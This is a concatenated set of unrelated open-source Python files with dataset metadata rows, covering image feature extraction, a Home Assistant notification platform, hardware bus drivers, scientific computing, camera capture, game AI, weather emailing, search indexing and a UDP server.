def _hogs(data, load=True, save=False, verbose=False):
# initialize config
config = _config()
# initialize variables
datapath = config['hogs_data_path']
data_hog = []
# load hog data if exists
if load and os.path.isfile(datapath):
if verbose: print('loading descriptors............ ', end = '')
data_hog = np.load(datapath)
if verbose: print('done')
# calculate hog data otherwise
else:
# initialize variables
ix = config['shape_x']
iy = config['shape_y']
bn = config['bins_n']
cx = config['cell_x']
cy = config['cell_y']
bw = config['blok_w']
bh = config['blok_h']
# perform hog
t_beg = time.time()
size = data.shape[0]
loop = 0
for image in data:
if verbose: print('\rextracting descriptors......... %d%%'
%(loop*100//size), end = '')
desc = skim.hog(image.reshape(ix, iy), orientations=bn,
pixels_per_cell=(cx, cy), cells_per_block=(bw, bh))
data_hog.append(desc)
loop = loop + 1
data_hog = np.array(data_hog, dtype='float64')
t_end = time.time()
if verbose: print('\rextracting descriptors......... done @ %8.2f sec'
%(t_end - t_beg))
# save data
if save:
if verbose: print('saving descriptors............. ', end = '')
np.save(datapath, data_hog)
if verbose: print('done')
# return hog
return data_hog
################################################################################
def _sift(data, load=True, save=False, verbose=False):
return data
################################################################################
def _surf(data, load=True, save=False, verbose=False):
return data
################################################################################
def _plot(classifier, train, valid, step=None, save=False, verbose=False):
# initialize config
config = _config()
# initialize variables
if step is None: step = config['steps_d']
plot_figs_head = config['classifier'] + '-' + config['preprocess']
plot_data_path = config['plot_data_path']
plot_figs_path = config['plot_figs_path']
m_train = train.shape[0]
m_valid = valid.shape[0]
X_valid = valid[:, 1:]
y_valid = valid[:, 0]
error_train = []
error_valid = []
sizes_train = []
# calculate data for plot
for i in range(0, m_train, step):
if verbose: print('\rgenerating plot................ %d%%'
%(i*100//m_train), end = '')
# randomly shuffle training data
np.random.shuffle(train)
# select subset of randomized training data
X_train = train[:i+step, 1:]
y_train = train[:i+step, 0]
# train classifier with selected data
classifier.fit(X_train, y_train)
# cross-validate classifier
p_train = classifier.predict(X_train)
p_valid = classifier.predict(X_valid)
# estimate errors
error_train.append(sum(y_train != p_train) / len(y_train))
error_valid.append(sum(y_valid != p_valid) / m_valid)
sizes_train.append(i+step)
error_train = np.array(error_train, dtype='float64')
error_valid = np.array(error_valid, dtype='float64')
sizes_train = np.array(sizes_train, dtype='uint32')
if verbose: print('\rgenerating plot................ done')
# plot data
pplt.plot(sizes_train, error_train, 'rs-', label='training error')
pplt.plot(sizes_train, error_valid, 'gs-', label='cross-validation error')
pplt.title(plot_figs_head.upper()+' Learning Curve')
pplt.xlabel('number of training instances')
pplt.ylabel('classification error')
pplt.legend()
xmin,xmax = pplt.xlim()
ymin,ymax = pplt.ylim()
pplt.axis([xmin, xmax+step, ymin, ymax+0.01])
pplt.grid(True)
# save data
if save:
if verbose: print('saving plot.................... ', end = '')
data = pd.DataFrame({'x1_TrainSizes':sizes_train,
'y1_TrainError':error_train,
'y2_ValidError':error_valid})
data.to_csv(plot_data_path, index=False)
pplt.savefig(plot_figs_path)
if verbose: print('done')
# display plot
pplt.show()
################################################################################
| gpl-3.0 | -7,425,339,864,518,901,000 | 29.16895 | 80 | 0.49493 | false | 4.050889 | true | false | false |
partofthething/home-assistant | homeassistant/components/pushsafer/notify.py | 1 | 6128 | """Pushsafer platform for notify component."""
import base64
import logging
import mimetypes
import requests
from requests.auth import HTTPBasicAuth
import voluptuous as vol
from homeassistant.components.notify import (
ATTR_DATA,
ATTR_TARGET,
ATTR_TITLE,
ATTR_TITLE_DEFAULT,
PLATFORM_SCHEMA,
BaseNotificationService,
)
from homeassistant.const import ATTR_ICON, HTTP_OK
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
_RESOURCE = "https://www.pushsafer.com/api"
_ALLOWED_IMAGES = ["image/gif", "image/jpeg", "image/png"]
CONF_DEVICE_KEY = "private_key"
CONF_TIMEOUT = 15
# Top level attributes in 'data'
ATTR_SOUND = "sound"
ATTR_VIBRATION = "vibration"
ATTR_ICONCOLOR = "iconcolor"
ATTR_URL = "url"
ATTR_URLTITLE = "urltitle"
ATTR_TIME2LIVE = "time2live"
ATTR_PRIORITY = "priority"
ATTR_RETRY = "retry"
ATTR_EXPIRE = "expire"
ATTR_ANSWER = "answer"
ATTR_PICTURE1 = "picture1"
# Attributes contained in picture1
ATTR_PICTURE1_URL = "url"
ATTR_PICTURE1_PATH = "path"
ATTR_PICTURE1_USERNAME = "username"
ATTR_PICTURE1_PASSWORD = "password"
ATTR_PICTURE1_AUTH = "auth"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({vol.Required(CONF_DEVICE_KEY): cv.string})
def get_service(hass, config, discovery_info=None):
"""Get the Pushsafer.com notification service."""
return PushsaferNotificationService(
config.get(CONF_DEVICE_KEY), hass.config.is_allowed_path
)
class PushsaferNotificationService(BaseNotificationService):
"""Implementation of the notification service for Pushsafer.com."""
def __init__(self, private_key, is_allowed_path):
"""Initialize the service."""
self._private_key = private_key
self.is_allowed_path = is_allowed_path
def send_message(self, message="", **kwargs):
"""Send a message to specified target."""
if kwargs.get(ATTR_TARGET) is None:
targets = ["a"]
_LOGGER.debug("No target specified. Sending push to all")
else:
targets = kwargs.get(ATTR_TARGET)
_LOGGER.debug("%s target(s) specified", len(targets))
title = kwargs.get(ATTR_TITLE, ATTR_TITLE_DEFAULT)
data = kwargs.get(ATTR_DATA, {})
# Converting the specified image to base64
picture1 = data.get(ATTR_PICTURE1)
picture1_encoded = ""
if picture1 is not None:
_LOGGER.debug("picture1 is available")
url = picture1.get(ATTR_PICTURE1_URL, None)
local_path = picture1.get(ATTR_PICTURE1_PATH, None)
username = picture1.get(ATTR_PICTURE1_USERNAME)
password = picture1.get(ATTR_PICTURE1_PASSWORD)
auth = picture1.get(ATTR_PICTURE1_AUTH)
if url is not None:
_LOGGER.debug("Loading image from url %s", url)
picture1_encoded = self.load_from_url(url, username, password, auth)
elif local_path is not None:
_LOGGER.debug("Loading image from file %s", local_path)
picture1_encoded = self.load_from_file(local_path)
else:
_LOGGER.warning("missing url or local_path for picture1")
else:
_LOGGER.debug("picture1 is not specified")
payload = {
"k": self._private_key,
"t": title,
"m": message,
"s": data.get(ATTR_SOUND, ""),
"v": data.get(ATTR_VIBRATION, ""),
"i": data.get(ATTR_ICON, ""),
"c": data.get(ATTR_ICONCOLOR, ""),
"u": data.get(ATTR_URL, ""),
"ut": data.get(ATTR_URLTITLE, ""),
"l": data.get(ATTR_TIME2LIVE, ""),
"pr": data.get(ATTR_PRIORITY, ""),
"re": data.get(ATTR_RETRY, ""),
"ex": data.get(ATTR_EXPIRE, ""),
"a": data.get(ATTR_ANSWER, ""),
"p": picture1_encoded,
}
for target in targets:
payload["d"] = target
response = requests.post(_RESOURCE, data=payload, timeout=CONF_TIMEOUT)
if response.status_code != HTTP_OK:
_LOGGER.error("Pushsafer failed with: %s", response.text)
else:
_LOGGER.debug("Push send: %s", response.json())
@classmethod
def get_base64(cls, filebyte, mimetype):
"""Convert the image to the expected base64 string of pushsafer."""
if mimetype not in _ALLOWED_IMAGES:
_LOGGER.warning("%s is a not supported mimetype for images", mimetype)
return None
base64_image = base64.b64encode(filebyte).decode("utf8")
return f"data:{mimetype};base64,{base64_image}"
def load_from_url(self, url=None, username=None, password=None, auth=None):
"""Load image/document/etc from URL."""
if url is not None:
_LOGGER.debug("Downloading image from %s", url)
if username is not None and password is not None:
auth_ = HTTPBasicAuth(username, password)
response = requests.get(url, auth=auth_, timeout=CONF_TIMEOUT)
else:
response = requests.get(url, timeout=CONF_TIMEOUT)
return self.get_base64(response.content, response.headers["content-type"])
_LOGGER.warning("url not found in param")
return None
def load_from_file(self, local_path=None):
"""Load image/document/etc from a local path."""
try:
if local_path is not None:
_LOGGER.debug("Loading image from local path")
if self.is_allowed_path(local_path):
file_mimetype = mimetypes.guess_type(local_path)
_LOGGER.debug("Detected mimetype %s", file_mimetype)
with open(local_path, "rb") as binary_file:
data = binary_file.read()
return self.get_base64(data, file_mimetype[0])
else:
_LOGGER.warning("Local path not found in params!")
except OSError as error:
_LOGGER.error("Can't load from local path: %s", error)
return None
| mit | -6,397,761,538,905,725,000 | 35.915663 | 86 | 0.602807 | false | 3.794427 | false | false | false |
thortex/rpi3-webiopi | webiopi_0.7.1/python/webiopi/devices/onewire.py | 1 | 2571 | # Copyright 2012-2013 Eric Ptak - trouch.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from webiopi.devices.bus import Bus, loadModule
EXTRAS = {
"TEMP": {"loaded": False, "module": "w1-therm"},
"2408": {"loaded": False, "module": "w1_ds2408"},
"2413": {"loaded": False, "module": "w1_ds2413"}
}
def loadExtraModule(name):
if EXTRAS[name]["loaded"] == False:
loadModule(EXTRAS[name]["module"])
EXTRAS[name]["loaded"] = True
class OneWire(Bus):
def __init__(self, slave=None, family=0, extra=None):
Bus.__init__(self, "ONEWIRE", "/sys/bus/w1/devices/w1_bus_master1/w1_master_slaves", os.O_RDONLY)
if self.fd > 0:
os.close(self.fd)
self.fd = 0
self.family = family
if slave != None:
addr = slave.split("-")
if len(addr) == 1:
self.slave = "%02x-%s" % (family, slave)
elif len(addr) == 2:
prefix = int(addr[0], 16)
if family > 0 and family != prefix:
raise Exception("1-Wire slave address %s does not match family %02x" % (slave, family))
self.slave = slave
else:
devices = self.deviceList()
if len(devices) == 0:
raise Exception("No device match family %02x" % family)
self.slave = devices[0]
loadExtraModule(extra)
def __str__(self):
return "1-Wire(slave=%s)" % self.slave
def deviceList(self):
devices = []
with open(self.device) as f:
lines = f.read().split("\n")
if self.family > 0:
prefix = "%02x-" % self.family
for line in lines:
if line.startswith(prefix):
devices.append(line)
else:
devices = lines
return devices;
def read(self):
with open("/sys/bus/w1/devices/%s/w1_slave" % self.slave) as f:
data = f.read()
return data
| apache-2.0 | -53,284,425,979,220,800 | 33.743243 | 107 | 0.558149 | false | 3.709957 | false | false | false |
NumCosmo/NumCosmo | examples/example_ode_spline.py | 1 | 1165 | #!/usr/bin/env python
try:
import gi
gi.require_version('NumCosmo', '1.0')
gi.require_version('NumCosmoMath', '1.0')
except:
pass
import ctypes
from math import *
from gi.repository import NumCosmoMath as Ncm
from gi.repository import NumCosmo as Nc
from gi.repository import GObject
#
# Initializing the library objects, this must be called before
# any other library function.
#
Ncm.cfg_init ()
class TestClass (Ncm.Model):
def __call__ (self, *args):
return args[0]
aas = TestClass ()
def test (y, x, data):
return y
test.argtypes = [ctypes.c_double, ctypes.c_double, ctypes.c_char_p]
test.restype = ctypes.c_double
s = Ncm.SplineCubicNotaknot.new ()
os = Ncm.OdeSpline.new (s, test)
os.set_reltol (1.0e-3)
os.props.xi = 0.0
os.props.xf = 5.0
os.props.yi = 1.0
nhaca = [1,2,3,4]
os.prepare (id (nhaca))
ss = os.peek_spline()
for i in range (ss.len):
print ("%d % 22.15g % 22.15g % 22.15g % 22.15g % 22.15g" % (i, ss.xv.get (i), ss.yv.get (i), ss.b.get (i), ss.c.get(i), ss.d.get(i)))
#for i in range (100):
# x = 1.0 / 99.0 * i
# expx = exp (x)
# odex = ss.eval (x)
# print (x, expx, odex, fabs ((expx - odex) / expx))
| gpl-3.0 | 8,754,895,868,490,639,000 | 19.438596 | 137 | 0.64206 | false | 2.377551 | true | false | false |
Geodan/natuurbandmodel | server-wps/wildfire_makelcp.py | 1 | 1431 | from geoserver.wps import process
from com.ziclix.python.sql import zxJDBC
jdbc_url = "jdbc:postgresql://192.168.40.5:3389/research"
username = "modeluser"
password = "modeluser"
driver = "org.postgresql.Driver"
cgi_url = "http://model.geodan.nl/main/gmi/cgi-bin/"
@process(
title='MakeLcp',
description='Build landscape file',
inputs={
'userid' : (int, 'User ID'),
'terreinid': (int,'Terrein ID'),
'landscapename': (str,'Name of landscape')
},
outputs={
'string': (str,'JSON string')
}
)
def run(userid, terreinid, landscapename):
#Connect to postgres
conn = zxJDBC.connect(jdbc_url,username, password, driver)
cur = conn.cursor()
query = """
INSERT INTO administration.runs ("user", model, status, percentage, lastupdate) VALUES (?,?,?, ?, now());
"""
data = [1,4,"scheduled",0]
cur.execute(query, data)
conn.commit()
query = """SELECT MAX(id) FROM administration.runs;"""
cur.execute(query)
result = cur.fetchone()
runid = result[0]
query = """
INSERT INTO administration.params_makelcp
(run, terrein_id, terrein_name)
VALUES
(?, ?, ?);
"""
data = [runid,terreinid,landscapename]
cur.execute(query, data )
conn.commit()
import subprocess
p = subprocess.Popen(['/usr/bin/curl','-u', 'demo:demo',cgi_url+'makeLcp.py'])
p.daemon = True
return '{"runid":'+str(runid)+',"status":"scheduled","percentage":0}'
| mit | 4,120,670,946,866,093,600 | 25 | 108 | 0.638714 | false | 2.873494 | false | false | false |
chaowu2009/stereo-vo | tools/capture_TwoCameras_saveImagesOnly.py | 1 | 2289 | import numpy as np
import cv2
import time
import matplotlib.pylab as plt
"""
Make sure that you hold the checkerboard horizontally (more checkers horizontally than vertically).
In order to get a good calibration you will need to move the checkerboard around in the camera frame such that:
the checkerboard is detected at the left and right edges of the field of view (X calibration)
the checkerboard is detected at the top and bottom edges of the field of view (Y calibration)
the checkerboard is detected at various angles to the camera ("Skew")
the checkerboard fills the entire field of view (Size calibration)
checkerboard tilted to the left, right, top and bottom (X,Y, and Size calibration)
"""
left = 1
right = 2
time_in_ms= 1000/100
#folder = "/home/cwu/Downloads/";
folder = "/home/hillcrest/project/stereo-calibration/calib_imgs/ARC/"
folder = "/home/hillcrest/project/stereo-calibration/calib_imgs/ARC/"
#folder = "D:/vision/stereo-calibration/calib_imgs/ARC/"
fp = open(folder + "timeStamp.txt","w")
WIDTH = 1280
HEIGHT = 720
WIDTH = 640
HEIGHT = 480
for counter in range(1,31):
millis = int(round(time.time() * 1000))
cap1 = cv2.VideoCapture(left)
cap1.set(cv2.CAP_PROP_FRAME_WIDTH,WIDTH)
cap1.set(cv2.CAP_PROP_FRAME_HEIGHT,HEIGHT)
cv2.waitKey(100)
ret, frame1 = cap1.read()
cap1.release()
cap2 = cv2.VideoCapture(right)
cap2.set(cv2.CAP_PROP_FRAME_WIDTH,WIDTH)
cap2.set(cv2.CAP_PROP_FRAME_HEIGHT,HEIGHT)
cv2.waitKey(100)
ret, frame2 = cap2.read()
cap2.release()
#frame1 = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
#frame2 = cv2.cvtColor(frame2, cv2.COLOR_BGR2GRAY)
# Display the resulting frame
plt.subplot(121)
plt.imshow(frame1)
plt.title('left')
plt.subplot(122)
plt.imshow(frame2)
plt.title('right')
plt.show()
print('another capture', counter)
cv2.waitKey(100)
cv2.imwrite(folder + "img_left/left_" + str(counter) + ".jpg", frame1)
cv2.waitKey(time_in_ms)
cv2.imwrite(folder + "img_right/right_" + str(counter) + ".jpg", frame2)
fp.write(str(counter)+ ","+ str(millis) + "\n")
print("the ", counter, " pairs")
cv2.destroyAllWindows()
fp.close()
print('All Done \n')
| mit | -5,414,921,834,074,587,000 | 25.929412 | 111 | 0.678462 | false | 3.093243 | false | false | false |
dnikulin/jula | scripts/make_classes.py | 1 | 3287 | # Copyright (C) 2011 Dmitri Nikulin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from common import SIZES, classname, mklabel, cells, startfile
def genmatrix(rows, cols):
myclass = classname(rows, cols)
fd = startfile("fixed", myclass)
def line(s=""):
print >> fd, s
traits = [("Matrix_%d_N" % rows), ("Matrix_M_%d" % cols)]
if (rows == cols):
traits.append("Matrix_M_M")
for trait in traits:
line("import org.dnikulin.jula.traits.%s;" % trait)
line()
line("import org.dnikulin.jula.functions.Copy;")
line()
line("public final class %s implements %s {" % (myclass, ", ".join(traits)))
line(" public static final int rows = %d;" % rows)
line(" public static final int cols = %d;" % cols)
line(" public static final int size = (rows * cols);")
line()
for row in range(rows):
labels = ", ".join([mklabel(row, col) for col in range(cols)])
line(" public double %s;" % labels)
line()
line(" @Override")
line(" public int getRows() {")
line(" return rows;")
line(" }")
line()
line(" @Override")
line(" public int getCols() {")
line(" return cols;")
line(" }")
line()
line(" @Override")
line(" public double get(final int row, final int col) {")
line(" assert(row >= 0);")
line(" assert(col >= 0);")
line(" assert(row < rows);")
line(" assert(col < cols);")
line()
line(" switch ((row * cols) + col) {")
for (row, col, label) in cells(rows, cols):
off = (row * cols) + col
line(" case %2d: return %s;" % (off, label))
line(" default: return 0;")
line(" }")
line(" }")
line()
line(" @Override")
line(" public void set(final int row, final int col, final double val) {")
line(" assert(row >= 0);")
line(" assert(col >= 0);")
line(" assert(row < rows);")
line(" assert(col < cols);")
line()
line(" switch ((row * cols) + col) {")
for (row, col, label) in cells(rows, cols):
off = (row * cols) + col
line(" case %2d: %s = val; return;" % (off, label))
line(" default: return;")
line(" }")
line(" }")
line()
line(" @Override")
line(" public %s clone() {" % (myclass))
line(" final %s that = new %s();" % (myclass, myclass))
line(" Copy.copy(this, that);")
line(" return that;")
line(" }")
line("}")
fd.flush()
fd.close()
if __name__ == '__main__':
for rows in SIZES:
for cols in SIZES:
genmatrix(rows, cols)
| apache-2.0 | -7,478,729,938,186,849,000 | 30.912621 | 81 | 0.531488 | false | 3.542026 | false | false | false |
MarkusHackspacher/unknown-horizons | horizons/ai/aiplayer/building/firestation.py | 1 | 3179 | # ###################################################
# Copyright (C) 2008-2017 The Unknown Horizons Team
# [email protected]
# This file is part of Unknown Horizons.
#
# Unknown Horizons is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# ###################################################
from horizons.ai.aiplayer.basicbuilder import BasicBuilder
from horizons.ai.aiplayer.building import AbstractBuilding
from horizons.ai.aiplayer.buildingevaluator import BuildingEvaluator
from horizons.ai.aiplayer.constants import BUILDING_PURPOSE
from horizons.constants import BUILDINGS
class AbstractFireStation(AbstractBuilding):
def iter_potential_locations(self, settlement_manager):
spots_in_settlement = settlement_manager.settlement.buildability_cache.cache[(2, 2)]
village_builder = settlement_manager.village_builder
for coords in village_builder.special_building_assignments[BUILDING_PURPOSE.FIRE_STATION].keys():
if coords not in spots_in_settlement or village_builder.plan[coords][1][0] > village_builder.current_section:
continue
object = settlement_manager.settlement.ground_map[coords].object
if object is None or object.buildable_upon:
yield (coords[0], coords[1], 0)
@property
def producer_building(self):
"""Fire stations don't produce any resources."""
return False
@property
def evaluator_class(self):
return FireStationEvaluator
@classmethod
def register_buildings(cls):
cls._available_buildings[BUILDINGS.FIRE_STATION] = cls
class FireStationEvaluator(BuildingEvaluator):
need_collector_connection = False
record_plan_change = False
@classmethod
def create(cls, production_builder, x, y, orientation):
settlement_manager = production_builder.settlement_manager
village_builder = settlement_manager.village_builder
builder = BasicBuilder.create(BUILDINGS.FIRE_STATION, (x, y), orientation)
assigned_residences = village_builder.special_building_assignments[BUILDING_PURPOSE.FIRE_STATION][(x, y)]
total = len(assigned_residences)
not_serviced = 0
for residence_coords in assigned_residences:
if village_builder.plan[residence_coords][0] == BUILDING_PURPOSE.RESIDENCE:
not_serviced += 1
if not_serviced <= 0 or not_serviced < total * settlement_manager.owner.personality_manager.get('AbstractFireStation').fraction_of_assigned_residences_built:
return None
return FireStationEvaluator(village_builder, builder, not_serviced)
@property
def purpose(self):
return BUILDING_PURPOSE.FIRE_STATION
AbstractFireStation.register_buildings()
| gpl-2.0 | -1,032,238,161,009,814,300 | 38.246914 | 159 | 0.754954 | false | 3.563901 | false | false | false |
EDUlib/eTracesX | Scripts/ExtractCours.py | 1 | 2359 | #!/usr/bin/python
import sys
import getopt
import re
import random
def main(argv):
inputfile = ''
outputfile = ''
try:
opts, args = getopt.getopt(argv,"hi:o:",["ifile=","ofile="])
except getopt.GetoptError:
print 'test.py -i <inputfile> -o <outputfile>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'test.py -i <inputfile> -o <outputfile>'
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
print 'Input file is :', inputfile
print 'Output file is :', outputfile
if inputfile == '' or outputfile == '':
sys.exit()
pUser =re.compile('"username": "([\w.@&\-]*)"')
pCours =re.compile('ITES\.1')
nameDict = dict()
f = open(inputfile, "r")
copy = open(outputfile, "w")
for line in f:
mCours = pCours.search(line)
if mCours:
mUser = pUser.findall(line)
newLine = ''
if len(mUser) == 1:
if mUser[0] != '':
if not nameDict.has_key(mUser[0]):
newName = ''.join(random.SystemRandom().choice('0123456789ABCDEF') for _ in range(16))
i = 0;
while (newName in nameDict.values()) and i < 1000:
newName = ''.join(random.SystemRandom().choice('0123456789ABCDEF') for _ in range(16))
i = i+1;
if i == 1000:
print "Can't find a name :", mUser[0]
sys.exit()
nameDict[mUser[0]] = newName;
# print 'Username is :', mUser[0], ' --- newName :', nameDict[mUser[0]]
newLine = re.sub('"username": "'+ mUser[0] + '"', '"username": "' + nameDict[mUser[0]] + '"', line)
# newLine = re.sub('"username": "'+ mUser[0] + '"', '"username": "' + mUser[0] + '"', line)
# newLine = line
else:
newLine = line
else:
print line
sys.exit()
if newLine != '':
copy.write(newLine)
f.close()
copy.close()
if __name__ == "__main__":
main(sys.argv[1:])
| agpl-3.0 | 3,712,799,693,199,665,700 | 34.208955 | 119 | 0.447647 | false | 3.804839 | false | false | false |
inflatus/Python | Weather/weather_email.py | 1 | 2252 | # using JSON and the WeatherUnderground API
# parsing data and emailing it to myself
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import urllib.request
import json
from API_KEYS import EMAIL_ADDRESS, EMAIL_PASSWORD
from API_KEYS import WEATHER_UNDERGROUND_KEY
# getting the url
f = urllib.request.urlopen('http://api.wunderground.com/api/' + WEATHER_UNDERGROUND_KEY + '/geolookup/conditions/q/IN/Martinsville.json')
# decoding the text
json_string = f.read().decode('utf-8')
# parsing the information
parsed_json = json.loads(json_string)
location = parsed_json['location']['city']
temp_f = parsed_json['current_observation']['temp_f']
relative_humidity = parsed_json['current_observation']['relative_humidity']
wind_mph = parsed_json['current_observation']['wind_mph']
wind_gust = parsed_json['current_observation']['wind_gust_mph']
pressure_mb = parsed_json['current_observation']['pressure_mb']
feels_like = parsed_json['current_observation']['feelslike_f']
visibility_mi = parsed_json['current_observation']['visibility_mi']
precipitation_in = parsed_json['current_observation']['precip_today_in']
weather = parsed_json['current_observation']['weather']
# setting the data for location and temperature
data = (('Current temperature in {} is: {} F\n'.format(location, temp_f)) +
('Relative Humidity is at: {}\n'.format(relative_humidity)) +
('Winds are: {} mph\n'.format(wind_mph)) +
('Wind gusts are at: {} mph\n'.format(wind_gust)) +
('Pressure is: {} mb\n'.format(pressure_mb)) +
('Feels like: {} F\n'.format(feels_like)) +
('Visibility is: {} mi\n'.format(visibility_mi)) +
('Precipitation today: {} inches\n'.format(precipitation_in)) +
('General weather is: {}'.format(weather)))
# compose email message
fromaddr = (EMAIL_ADDRESS)
toaddr = (EMAIL_ADDRESS)
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Current Weather"
body = (data)
msg.attach(MIMEText(body, 'plain'))
# authenticate and send email
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, (EMAIL_PASSWORD))
text = msg.as_string()
server.sendmail(fromaddr, toaddr, text)
server.quit()
| mit | -1,424,017,478,444,561,400 | 36.533333 | 137 | 0.709147 | false | 3.273256 | false | false | false |
academic-colab/maslo-server | FTS.py | 1 | 5261 | #!/usr/bin/env python
'''
/******************************************************************************
* FTS.py
*
* Copyright (c) 2011-2012, Academic ADL Co-Lab, University of Wisconsin-Extension
* http://www.academiccolab.org/
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
* MA 02110-1301 USA
*****************************************************************************/
'''
import sys
import os
import json
import urllib2
import re
import sqlite3 as dbs
## Reads a json file and returns a json object
def getJSON(path, isRelative=True):
if isRelative :
fPath = path + "/manifest"
else :
fPath = path
try :
f = open(fPath)
except :
print "File ", fPath, " cannot be opened."
return None
else :
data = json.load(f)
f.close()
return data
## Strip string passed as argument from common stopwords
def removeStopWords(text):
stopwords = ""
try :
f = open("stopwords.txt", "r")
except :
f = urllib2.urlopen('http://www.textfixer.com/resources/common-english-words.txt')
stopwords = f.read()
f = open("stopwords.txt", "w")
f.write(stopwords)
f.close()
else :
stopwords = f.read()
f.close()
stopwords = stopwords.strip().split(",")
for stopword in stopwords :
pattern = re.compile(r"\b%s\b"%stopword, re.IGNORECASE)
text = pattern.sub("", text)
pattern = re.compile("[\s]+")
text = pattern.sub(" ", text)
return text
## Create full text search table for pack contents
def createTable(db):
statement = "CREATE VIRTUAL TABLE content_search using FTS3(pack,section,content,tokenize=porter);"
try :
db.execute(statement)
db.commit()
except:
pass
## Create basic content pack table
def createTableUpper(db):
statement = "CREATE TABLE content (pack text, path text, version text, author text, public int DEFAULT 0, category text);"
try :
db.execute(statement)
db.commit()
except:
pass
## insert data into content pack tables - FTS and basic
def insertData(pack, path, db, zipName=None, versionPath=None, author=None):
data = getJSON(path)
query = "INSERT INTO content_search(pack, section, content) VALUES (?,?,?)"
query2 = "INSERT INTO content(pack, path, version, author, category) VALUES (?,?,?,?,?)"
if zipName :
version = "0"
category = ""
authorVal = ""
if versionPath is not None and author is not None :
print versionPath
versionData = getJSON(versionPath, False)
if versionData and "version" in versionData :
version = versionData["version"]
if versionData and "category" in versionData :
category = versionData["category"]
authorVal = author
try :
zn = zipName.replace("qDir-", "")
db.execute(query2, (pack.decode('utf-8'), zn.decode('utf-8'),version, authorVal.decode('utf-8'), category))
except Exception, e:
print "Insert failed: ",pack, zn, version, authorVal
print e
pass
pattern = re.compile("<[^>]+>")
print data
for entry in data :
title = entry["title"]
normalTitle = removeStopWords(title)
try :
db.execute(query, (pack.decode('utf-8'), title, normalTitle,))
except Exception, e:
print "error:", e
return
text = None
uPath = path.decode('utf-8')
if entry["type"] == "text" :
newPath = uPath+"/../"+entry["path"]
f = open(newPath)
text = f.read().strip()
f.close()
else :
newPath = uPath+"/../"+ entry["path"]+".dsc"
try :
f = open(newPath)
text = f.read().strip()
f.close()
except :
pass
if text is not None:
text = text.decode('utf-8')
text = pattern.sub(" ", text)
text = removeStopWords(text)
try :
db.execute(query, (pack.decode('utf-8'), title, text,))
except Exception, e:
print "error:", e
return
db.commit()
## Create tables if they don't exist, index argument-passed content pack, create database entries
def main(pathToManifest, PackName, pathToGlobalSearch=None, zipName=None, versionPath=None, author=None):
db = dbs.connect(pathToManifest+"/search.db")
createTable(db)
insertData(PackName, pathToManifest, db)
db.close()
if (pathToGlobalSearch) :
db = dbs.connect(pathToGlobalSearch+"/search.db")
createTable(db)
createTableUpper(db)
insertData(PackName, pathToManifest, db, zipName,versionPath, author)
db.close()
## And now ... get to work.
if __name__ == "__main__" :
path = sys.argv[1]
pack = sys.argv[2]
globalDb = None
zipName = None
versionPath = None
author = None
if len(sys.argv) > 3 :
globalDb = sys.argv[3]
if len(sys.argv) > 4 :
zipName = sys.argv[4]
if len(sys.argv) > 5 :
versionPath = sys.argv[5]
author = sys.argv[6]
main(path, pack, globalDb, zipName, versionPath, author)
| gpl-3.0 | 3,676,473,972,005,454,000 | 27.437838 | 123 | 0.657099 | false | 3.1731 | false | false | false |
madformuse/server | server/natpacketserver.py | 1 | 1848 | import socket
from server.subscribable import Subscribable
from .decorators import with_logger
@with_logger
class NatPacketServer(Subscribable):
def __init__(self, loop, port):
super().__init__()
self.loop = loop
self.port = port
self._logger.debug("{id} Listening on {port}".format(id=id(self), port=port))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port))
s.setblocking(False)
loop.add_reader(s.fileno(), self._recv)
self._socket = s
self._subscribers = {}
def close(self):
self.loop.remove_reader(self._recv())
try:
self._socket.shutdown(socket.SHUT_RDWR)
except OSError as ex:
self._logger.exception(ex)
finally:
self._socket.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def _recv(self):
try:
data, addr = self._socket.recvfrom(512)
self._logger.debug("Received UDP {} from {}".format(data, addr))
if data[0] == 0x8:
self._logger.debug("Emitting with: {} {} {} ".format(data[1:].decode(),
addr[0], addr[1]))
self.notify({
'command_id': 'ProcessServerNatPacket',
'arguments': ["{}:{}".format(addr[0], addr[1]), data[1:].decode()]
})
